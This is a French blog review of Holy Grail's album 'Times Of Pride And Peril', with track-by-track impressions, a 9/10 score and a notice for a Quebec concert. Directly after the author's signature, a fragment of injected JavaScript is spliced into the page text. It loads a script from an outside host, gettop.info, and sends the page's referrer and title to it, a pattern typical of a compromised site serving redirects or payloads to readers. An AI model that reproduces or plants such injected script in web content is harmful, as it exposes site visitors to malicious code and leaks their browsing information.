Critique d’album: Times Of Pride And Peril du groupe Holy Grail


Facebooktwitterredditpinterestlinkedinmail

Bonjour à vous tous !
On se retrouve aujourd’hui pour une critique d’album.
L’album en question est ‘’Times Of Pride And Peril’’ du groupe ‘’Holy Grail’’.
Cet album marquera la troisième production de la formation Californienne. La sortie de cet album est prévue pour le 12 février 2016, via ‘’Prosthetic Records’’.
Après plusieurs écoutes, j’ai trouvé cet album plus qu’excellent et il apporte un certain vent de fraîcheur à ce qu’on est habitué d’entendre. Sans plus tarder, laissez-moi-vous donner mon avis sur ce petit bijou. Je serai plus que neutre dans ma critique car je ne connaissais pas le groupe jusqu’à maintenant alors, il s’agit donc pour moi d’une superbe découverte. Allons-y sans plus attendre !!

L’album commence en force avec la chanson ‘’Crystal King’’. Ce titre donne immédiatement le ton pour le reste de l’album, soit un ton fort, puissant et rythmé à souhait. Rajoutez à ça une voix parfois clear, qui ne se gêne pas de lever d’intensité pour avoir une voix plus aigüe, rappelant parfois la voix du chanteur d’AC/DC.

C’est sans temps morts que ‘’Waste Them All Away’’ débute. Dès le départ, les instruments se font entendre uns à uns pour ensuite enchaîner rapidement avec des riffs/solos de guitare qui donne le rythme souhaité pour le reste du titre. C’est un peu la même routine pour la chanson suivante, ‘’Sudden Death’’.
‘’Those Who Will Remain’’ prend la quatrième place sur l’album et ce, sur un rythme plus lent, mais tout aussi efficace que ses prédécesseurs. C’est bon d’avoir plusieurs variations de rythme, de rapidité d’exécution et de tons tout au long de l’album comme ce l’est jusqu’à présent. Ainsi il y a moins de chances qu’on tombe dans la redondance, ce qui nous ferait rapidement oublier l’album.

Nous voilà rendu au cinquième titre, et de loin ma préférée de l’album. ‘’Descent Into The Maelstrom’’ commence directement avec un puissant solo/riff de guitare, rappelant quasiment des solos joués par des bands de death metal. Par la suite on retrouve rapidement la puissante voix de James Paul Luna, qui nous entraîne dans une série de rythme et de variations différents. Que dire du refrain, il va vous rester collé en tête tel un ver d’oreille qui s’incruste dans vos pensées et qui est fait pour resté longtemps. Tout est parfait dans cette chanson. Quelque part au milieu du titre, il y a même un super solo de guitare qui vient rajouter un certain cachet supplémentaire au résultat final. Je me répète encore une fois, mais cette chanson est pour ma part, la meilleure de l’album.

Suite à ça s’en suivront les titres ‘’Apotheosis’’, ‘’Psychomachia’’, ‘’No More Heroes’’ & ‘’Pro Patria Mori’’. Ces chansons gardent la même recette gagnante que les autres titres, soit des riffs/solos de guitares rythmées à fond, une voix changeant de tonalité et des refrains qui se gravent dans nos têtes. Mention spéciale à ‘’Pro Patria Mori’’ pour son refrain plus qu’accrocheurs qu’on se surprend a fredonner même après avoir fini de l’écouter.

Vient en suite le dernier titre de l’album ‘’Black Lotus’’. Pour moi, c’est la chanson la plus puissante de l’album. Au travers des différents passages de guitares et même de basse, on retrouve une partie de ‘’screams’’ à la fin, amenant un côté encore plus hard au titre.

Pour conclure, cet album est pour moi une excellente découverte. C’est certains qu’à partir de maintenant, ‘’Holy Grail’’ vas faire parti des groupes à suivre de très près. Certains regretteront peut-être le manque de screams et de passages plus hard tel qu’entendu dans ‘’Black Lotus’’, mais tous les goûts sont dans la nature et je vous assure que malgré ça, l’album reste un indispensable et il reste toujours aussi bon même après une tonne d’écoute à répétition.

Je lui donne la note de 9/10
Je vous conseil fortement d’écouter cet album lors de sa sortie.
L’album sortira le 12 février prochain.
Je vous encourage fortement à acheter l’album pour supporter le band.

Je vous rappelle également que le groupe sera de passage à Québec, au Cercle, le mardi 1er mars. Les billets sont déjà en vente sur www.lepointdevente.com, ou à la billetterie du Cercle et à la boutique EXO.

Sur ce, on se dit à une prochaine fois !

Rock On !

Christopher Drouin!s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Previous Album Review : Times of Pride and Peril from Holy Grail
Next Photo: Iron Maiden Centre Vidéotron 2019

No Comment

Leave a reply

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *